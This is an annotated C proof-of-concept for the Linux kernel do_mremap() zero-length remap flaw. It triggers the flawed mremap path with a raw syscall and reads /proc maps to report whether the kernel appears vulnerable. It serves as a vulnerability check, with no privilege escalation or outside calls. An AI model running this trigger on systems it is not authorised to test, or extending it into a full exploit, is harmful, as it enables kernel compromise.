Linux kernel do_mremap() vulnerability: proof-of-concept code
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <asm/unistd.h>
#include <errno.h>
/* mremap() flag asking for the mapping to be placed at a caller-chosen address. */
#define MREMAP_FIXED 2
/* Hard-coded page size; NOTE(review): assumes 4 KiB pages rather than asking the system. */
#define PAGESIZE 4096
/* Size of the anonymous test mapping created in main(): two pages. */
#define VMASIZE (2*PAGESIZE)
/* Size of the buffer read_maps() uses for each chunk of the maps file. */
#define BUFSIZE 8192
/*
 * The _syscallN macros build the syscall number as __NR_<name>, so this alias
 * makes the stub named real_mremap issue the mremap system call.
 */
#define __NR_real_mremap __NR_mremap
/*
 * Defines real_mremap(old_address, old_size, new_size, flags, new_address)
 * through the legacy _syscall5 kernel-header macro, presumably so the request
 * reaches the kernel without going through the C library's mremap() wrapper.
 * NOTE(review): current kernel headers no longer provide _syscall5, so this
 * listing builds only against headers that still do.
 */
static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );
/* Flag values for read_maps(): only print the maps file ... */
#define MAPS_NO_CHECK 0
/* ... or print it and also pass each chunk to maps_check(). */
#define MAPS_CHECK 1
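/* Non-zero once maps_check() has seen a mapping that starts at the probe address. */
int mremap_check = 0;

/*
 * Scan one NUL-terminated chunk of /proc/<pid>/maps text and increment
 * mremap_check (at most once per call) when a mapping starts at 0x70000000.
 *
 * The match is anchored to the start of a line and includes the '-' that
 * follows the start address. A bare substring search for "70000000" would
 * also fire on an end address, an offset or an inode number and report a
 * false positive.
 *
 * buf must be NUL-terminated by the caller; a NULL buf is ignored.
 */
void maps_check(char *buf)
{
    static const char probe[] = "70000000-";
    const char *line = buf;

    if (buf == NULL)
        return;

    while (line != NULL && *line != '\0') {
        if (strncmp(line, probe, sizeof probe - 1) == 0) {
            mremap_check++;
            return;
        }
        /* Advance to the character after the next newline, if any. */
        line = strchr(line, '\n');
        if (line != NULL)
            line++;
    }
}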
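/*
 * Rewind the already-open maps file and copy it to standard output.
 *
 * fd   - descriptor for the maps file, opened for reading
 * path - name of that file, used only in error messages
 * flag - MAPS_CHECK to also pass every chunk to maps_check(),
 *        MAPS_NO_CHECK to print only
 *
 * Returns nothing. A failed lseek() or read() is reported on stderr and the
 * function returns; a failed or short write terminates the process.
 */
void read_maps(int fd, char *path, unsigned long flag)
{
    ssize_t nbytes;
    char buf[BUFSIZE];

    if (lseek(fd, 0, SEEK_SET) < 0) {
        fprintf(stderr, "Unable to lseek %s\n", path);
        return;
    }

    /* The caller prints with stdio; flush so the raw write() below keeps order. */
    fflush(stdout);

    /*
     * Read one byte less than the buffer holds so the chunk can be
     * NUL-terminated: maps_check() uses string functions, and scanning an
     * unterminated buffer would run past the end of buf.
     */
    while ((nbytes = read(fd, buf, BUFSIZE - 1)) > 0) {
        buf[nbytes] = '\0';
        if (flag & MAPS_CHECK)
            maps_check(buf);
        if (write(STDOUT_FILENO, buf, nbytes) != nbytes) {
            fprintf(stderr, "Unable to write contents of %s\n", path);
            exit(1);
        }
    }

    /* A read error would otherwise look like a clean end of file. */
    if (nbytes < 0)
        fprintf(stderr, "Unable to read %s\n", path);
}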
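/*
 * Local check for the do_mremap() zero-length remap flaw.
 *
 * Creates a two-page anonymous mapping, prints the process's memory map,
 * then asks the kernel to remap with old_size 0 and new_size 0 to the fixed
 * address 0x70000000 and prints the map again. The second pass is scanned
 * for a mapping at 0x70000000; the test treats such an entry as evidence
 * that the kernel accepted the zero-length request.
 *
 * Returns 0 after printing the report, 1 if the maps file cannot be opened
 * or the test mapping cannot be created.
 */
int main(int argc, char **argv)
{
    void *base;
    char path[32];
    int fd;

    (void)argc;
    (void)argv;

    /* Bounded format: an 18-byte buffer overflows once the pid has 7 digits. */
    snprintf(path, sizeof path, "/proc/%ld/maps", (long)getpid());

    /* open() reports failure with -1, not 0. */
    fd = open(path, O_RDONLY);
    if (fd < 0) {
        fprintf(stderr, "Unable to open %s\n", path);
        return 1;
    }

    /* 0x60000000 is only a hint here; anonymous mappings take fd -1. */
    base = mmap((void *)0x60000000, VMASIZE, PROT_READ | PROT_WRITE,
                MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (base == MAP_FAILED) {
        fprintf(stderr, "Unable to mmap test region\n");
        close(fd);
        return 1;
    }

    /* Cast for the format: passing a pointer to %x is undefined behaviour. */
    printf("\nBase address : 0x%lx\n\n", (unsigned long)base);
    read_maps(fd, path, MAPS_NO_CHECK);

    printf("\nRemapping at 0x70000000...\n\n");
    /*
     * The return value is not what decides the verdict: the report below is
     * based solely on whether the maps file shows the probe address.
     */
    base = real_mremap(base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
                       (void *)0x70000000);
    read_maps(fd, path, MAPS_CHECK);

    printf("\nReport : \n");
    if (mremap_check)
        printf("This kernel appears to be VULNERABLE\n\n");
    else
        printf("This kernel appears to be NOT VULNERABLE\n\n");

    close(fd);
    return 0;
}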